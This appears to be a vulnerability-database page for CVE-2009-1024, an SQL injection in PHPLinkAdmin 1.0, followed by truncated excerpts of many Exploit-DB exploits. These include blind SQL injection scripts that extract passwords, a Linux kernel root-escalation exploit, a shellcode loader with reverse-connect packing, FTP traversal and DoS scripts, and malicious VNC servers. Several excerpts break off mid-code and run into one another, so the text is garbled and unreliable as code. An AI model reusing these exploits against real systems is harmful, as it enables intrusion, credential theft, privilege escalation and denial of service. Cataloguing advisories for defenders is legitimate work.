CVE-2009-1024
published 2009-03-20CVE-2009-1024: Multiple SQL injection vulnerabilities in Beerwin PHPLinkAdmin 1.0 allow remote attackers to execute arbitrary SQL commands via the linkid parameter to…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.34%
67.8th percentile
Multiple SQL injection vulnerabilities in Beerwin PHPLinkAdmin 1.0 allow remote attackers to execute arbitrary SQL commands via the linkid parameter to edlink.php, and unspecified other vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| beerwin | phplinkadmin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass
exploitdb·2010-03-05·CVSS 7.5
CVE-2009-4018 [HIGH] Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass
Kolang 4.3.10
// "shellcode loader" : load and execute arbitrary shellcode from a file
// Hamid Ebadi
#define O_RDONLY 00 ; fcntl.h
#define SHELLCODE_MAX_SIZE 1024
// change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
#define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
void getuid()
{
unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
int fd;
char shellcode[SHELLCODE_MAX_SIZE];
char filename[]=SHELLCODE_FILENAME ;
// we can also pass the shellcode in program's arguments
if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) > 8)&255 );
$port2 = sprintf('%c', ($port>> 0)&255 );
$part = explode('.', $ip);
//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
/*
* linux/x86
Exploit-DB
Home FTP Server - 'MKD' Directory Traversal
exploitdb·2009-11-17
CVE-2009-4053 Home FTP Server - 'MKD' Directory Traversal
Home FTP Server - 'MKD' Directory Traversal
---
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
sock.send("MKD ../A\r\n")
sock.close()
sys.exit(0);
Exploit-DB
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
exploitdb·2009-11-13
CVE-2009-4108 XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service
---
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py \n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
so
Exploit-DB
Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service
exploitdb·2009-11-09
CVE-2009-3888 Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service
Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service
---
int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
return a;
}
Exploit-DB
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
exploitdb·2009-08-31·CVSS 7.8
CVE-2009-2698 [HIGH] Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
Linux Kernel 2.6 .
**
*/
#include
#include
#include
#include
#include
#include
#include
unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
unsigned *addr=task;
while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
addr++;
}
addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
return;
}
void exploit();
void kernel_code()
{
asm("exploit:\n"
"push %eax\n"
"movl $0xfffff000,%eax\n"
"andl %esp,%eax\n"
"pushl (%eax)\n"
"call get_root_uid\n"
"addl $4,%esp\n"
"popl %eax\n");
return;
}
void *kernel=kernel_code;
int main(int argc, char **argv)
{
int fd=0;
char buf[1024];
struct sockaddr x0x;
void *zero_page;
uid=getuid();
gid=getgid();
if(uid==0){
fprintf(stderr,"[-] check ur uid\n");
return -1;
}
if(personality(0xffffffff)==PER_SVR
Exploit-DB
Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2009-07-13
CVE-2009-3947 Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)
Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)
---
#########################################################################################
# #
# TANDBERG BoF v0.1 - Tandberg MXP F7.0 "%sys.argv[0]
print "[-] Example: python poc.py 192.168.1.23 23\n"
sys.exit(0)
try:
print "[+] Connecting... %s" %sys.argv[1]
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],int(sys.argv[2])))
print "[+] Sending data..."
time.sleep(1.2)
s.send(buff)
print "[+] Deed Done"
s.recv(1024)
except:
print "[#] Unable to connect"
# milw0rm.com [2009-07-13]
Exploit-DB
ToyLog 0.1 - SQL Injection / Remote Code Execution
exploitdb·2009-07-10
CVE-2009-3750 ToyLog 0.1 - SQL Injection / Remote Code Execution
ToyLog 0.1 - SQL Injection / Remote Code Execution
---
--+++=====================================================================================+++--
--+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++--
--+++=====================================================================================+++--
[+] SQL Injection Vulnerability
Url: http://localhost/ToyLog/read.php?idm=1%20UNION%20ALL%20SELECT%201,username,password,4%20FROM%20user
[+] Remote Command Execution Exploit
#!/usr/bin/php
+\n".
"- Ex. : php xpl.php http://localhost/ToyLog/ -\n".
"+ +\n".
"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n".
"\n");
}
function hex_format ($string) {
$i=0;
while ($i(.+?) on|", fgets ($fp, 1024), $data))
$path = $data [1];
list ($path) = explode
Exploit-DB
Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service
exploitdb·2009-05-29
CVE-2009-1961 Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service
Linux Kernel 2.6.x - 'splice(2)' Double Lock Local Denial of Service
---
/*
source: https://www.securityfocus.com/bid/35143/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an affected process to hang, denying service to legitimate users. Other denial-of-service attacks are also possible.
This issue was introduced in Linux Kernel 2.6.19. The following versions have been fixed:
Linux Kernel 2.6.30-rc3
Linux Kernel 2.6.27.24
Linux Kernel 2.6.29.4
*/
pipe(pfds);
snprintf(buf, sizeof(buf), "/tmp/%d", getpid());
fd = open(buf, O_RDWR | O_CREAT, S_IRWXU);
if (fork()) {
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
} else{
sleep(1);
splice(pfds[0], NULL, fd, NULL, 1024, NULL);
}
Exploit-DB
Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
exploitdb·2009-05-04
CVE-2009-1478 Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
Solaris 10 / OpenSolaris - 'dtrace' Local Kernel Denial of Service (PoC)
---
/* solaris-dtrace-dos.c
*
* Copyright (c) 2008 by
*
* Solaris >= 10/Opensolaris local kernel DoS POC
* by mu-b - Mon 17 Nov 2008
*
* - Tested on: Sun Solaris 10 (SPARC)
* Sun OpenSolaris
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DTRACE_HELPER "/dev/dtrace/helper"
static unsigned int changes = 0;
void *
hammer (void *arg)
{
struct dof_hdr *phdr;
phdr = arg;
while (1)
{
phdr->dofh_loadsz = -1;
changes++;
usleep (10);
}
}
int
main (int argc, char **argv)
{
union {
struct dof_hdr hdr;
unsigned char buf[256*1024];
} hdr_t;
struct dof_hdr *phdr;
int i, fd, n, tid;
printf ("Solaris >= 10/Opensolaris local kernel DoS PoC\n"
"by: \n"
"http://www.digit-labs.org/ -- D
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
---
/* xnu-profil-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
/* profil defines */
#define PROFIL_LEAK_NUM 65536 * 128
int
main (int argc, char **argv)
{
char buf[1024];
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
printf ("* opening profil, pid: %d...", getpid ());
if ((n = syscall (SYS_profil, &buf, sizeof buf, 0, 1)) < 0)
{
fprintf (stderr, "\n%s: syscall [SYS_profil]: failed: %d\n",
argv[0], n);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("* filling %d-bytes of kernel memory...\n", PROFIL_LEAK_NUM * 32);
fflush (stdout);
for (i = 0; i < PROFIL_LEAK_NUM; i++)
{
if ((n = syscall (SYS_
Exploit-DB
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1238 Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
---
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating ham
Exploit-DB
Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection
exploitdb·2009-03-16
CVE-2009-1025 Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection
Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection
---
#######################################################################################################################
[+] Beerwin's PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#######################################################################################################################
[+] Download : http://www.downloads.beerwin.com/index.php?p=showdl&dl=16&cat=18
[+] Remote File Inclusion
Direct acces to linkadmin.No auth.
Vulnerable code in linkadmin.php :
$page = $_REQUEST['page'];
if (!$page){
echo "Welcome to the PHPLINKADMIN!. Please select an action from
the left menu.";
}else{
include $page;
}
PoC :
http://127.0.0.1
Exploit-DB
TightVNC - Authentication Failure Integer Overflow (PoC)
exploitdb·2009-02-09·CVSS 10.0
CVE-2009-0388 [CRITICAL] TightVNC - Authentication Failure Integer Overflow (PoC)
TightVNC - Authentication Failure Integer Overflow (PoC)
---
#!/usr/bin/env python
#[email protected]
# Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x02\x02\x10'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = '\x00'*4
clientsocket.sendall(data)
data = ('\x00'*3)+'\x01'
clientsocket.sendall(data)
data = ('\x00'*3)+'\x02STDVVNCAUTH_'
clientsocket.sendall(data)
data_cli = clientsocket.r
Exploit-DB
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
exploitdb·2009-02-04
CVE-2009-0388 UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)
---
#!/usr/bin/env python
# POC: Multiple VNC Clients Multiple Integer Overflow Vulnerabilities(UltraVNC and TightVNC), BID 33568
#Author: Andres Lopez Luksenberg (Visit: http://208.66.16.113/~andres/)
#
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
print "Author: Andres Lopez Luksenberg (Visit: http://208.66.16.113/~andres/)"
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.003\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x00'
clientsocket.sendall(data)
data = '\x00\x00\x00\x75'
clientsocket.sendall(data)
data = '\x00' * int(0xffffff)
clientsocket
Exploit-DB
SmartSiteCMS 1.0 - Blind SQL Injection
exploitdb·2009-01-28
CVE-2009-0405 SmartSiteCMS 1.0 - Blind SQL Injection
SmartSiteCMS 1.0 - Blind SQL Injection
---
#!/usr/bin/python
import sys
import re
from socket import *
class exploit:
def __init__(self,host,path,user):
self.host=host
self.path=path
self.user=user
self.reg=re.compile("")
def set_query(self,n,ch):
self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
self.query = self.query.replace(" ","%20")
self.query = self.query.replace("'","%27")
self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
def check(self):
sock=socket(AF_INET, SOCK_STREAM)
sock.connect((self.host, 80))
sock.send(self.request)
r=""
t="-"
while(t!=""):
t=sock.recv(1024)
r+=t
match=self.reg.search(r)
if(r[match.start()+27:match.start()+59]!=""
Exploit-DB
Pardal CMS 0.2.0 - Blind SQL Injection
exploitdb·2009-01-22
CVE-2009-0279 Pardal CMS 0.2.0 - Blind SQL Injection
Pardal CMS 0.2.0 - Blind SQL Injection
---
--+++=============================================================+++--
--+++====== Pardal CMS ".
"\n[+] Ex. : php xpl.php localhost /PardalCMS Admin".
"\n\n";
exit ();
}
function query ($user, $chr, $pos)
{
$query = "x' OR ASCII(SUBSTRING((SELECT senha FROM users WHERE login = '{$user}'),{$pos},1))='{$chr}";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}
function exploit ($hostname, $path, $user, $pos, $chr)
{
$chr = ord ($chr);
$fp = fsockopen ($hostname, 80);
$query = query ($user, $chr, $pos);
$request = "GET {$path}/comentar.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
fputs ($fp, $request);
while (!feof ($fp))
$reply .= fgets ($fp, 1024);
f
No writeups or analysis indexed.
http://osvdb.org/52778http://secunia.com/advisories/34323http://www.securityfocus.com/bid/34129http://www.vupen.com/english/advisories/2009/0733https://exchange.xforce.ibmcloud.com/vulnerabilities/49265https://www.exploit-db.com/exploits/8216http://osvdb.org/52778http://secunia.com/advisories/34323http://www.securityfocus.com/bid/34129http://www.vupen.com/english/advisories/2009/0733https://exchange.xforce.ibmcloud.com/vulnerabilities/49265https://www.exploit-db.com/exploits/8216
2009-03-20
Published